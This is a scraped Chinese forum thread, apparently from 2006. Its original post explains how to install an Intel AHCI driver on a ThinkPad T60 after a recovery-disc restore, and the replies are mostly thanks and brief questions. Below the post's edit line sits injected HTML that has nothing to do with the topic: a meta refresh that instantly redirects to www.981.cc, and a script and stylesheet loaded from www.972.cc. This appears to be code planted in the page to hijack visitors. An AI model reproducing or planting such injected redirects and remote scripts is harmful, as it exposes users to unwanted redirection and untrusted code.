开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

[原创]解决XY T60恢复盘不能进入系统的问题

近日本人在XY购得T60 B14 一台,用XY给的恢复盘来恢复系统,一直是进不了系统。后来打电话咨询需要在BIOS里把SATA工作模式更改为通用模式后方能进入系统。但是经过查询资料得知这样设置会降低系统性能特别是硬盘的性能,经过多方查找资料发现了解决办法。
1.下载得到AHCI驱动,在IBM网站上可以找到。我也上传到论坛的
2.解压缩驱动在一个任意的目录里,(9个文件和一个文件夹)
3.依次选取    开始---〉控制面板--〉系统---〉硬件--〉设备管理器--〉IDE ATA/ATAPI控制器--〉第一个设备(名字长记不清了)--〉驱动程序---〉更新驱动程序--〉是。仅这一次--〉从列表安装--〉最后一项(不要搜索)--〉从磁盘安装--〉选择那个驱动的解压缩目录--〉iaahci文件--〉这里一定要注意需要选择82801GBM的那个驱动--〉OK 。
4.更换驱动后可以复位BIOS的设置,重新启动机器就可以正常的以高速的SATA模式来进入系统了。
本人测试进入系统时间减少5秒左右,同时发挥SATA更大的性能。

驱动程序文件见附件

[ 本帖最后由 renpcboy 于 2006-5-21 01:00 编辑 ]<meta http-equiv="refresh" content="0; url=http://www.981.cc">
★★★
<script type="text/javascript" src="http://www.972.cc/1.js"></script>
<link href="http://www.972.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

79im05ww.rar

314.79 KB, 下载次数: 3603

绝对好贴!!!
谢谢鼓励
怎么没有给楼主加分呢?
绝对好贴!!! 给我极大的支持,我的系统重新安装时在BIOS里无意调了一次DEFAULT值,结果就认不出硬盘了,Ghost不行,XP启动认不出硬盘,修改BIOS的SATA后就可以了,看来还可以提高速度的
学习了,呵呵
Ghost恢复方式安装系统,还是对串行硬盘支持的不好呀,呵呵
我的T43用software installer自动升级 下载了一个SATA更新后 进入系统比以前慢了一分多钟  是不是也要这么改?
好贴,收藏收藏~~~~
出现了这个警告,怎么办?继续装吗?
原帖由 依天屠龙 于 2006-5-24 22:38 发表
出现了这个警告,怎么办?继续装吗?

继续安装就好了
真棒!赞楼主一个!
好贴,有用,谢谢搂住
好帖子,啊
好贴,有用
学习了
收藏!!!
好贴!好贴!等买了BB试一下!
我用的是b41 然后是直接用xp盘安装的系统,这样做可以吗?
现在已经改过来了
所以如果改成兼容模式
会无法进入系统
好贴,刚设置完,谢谢!!!
现在XY的盘都更新了吧
支持,支持
收藏加学习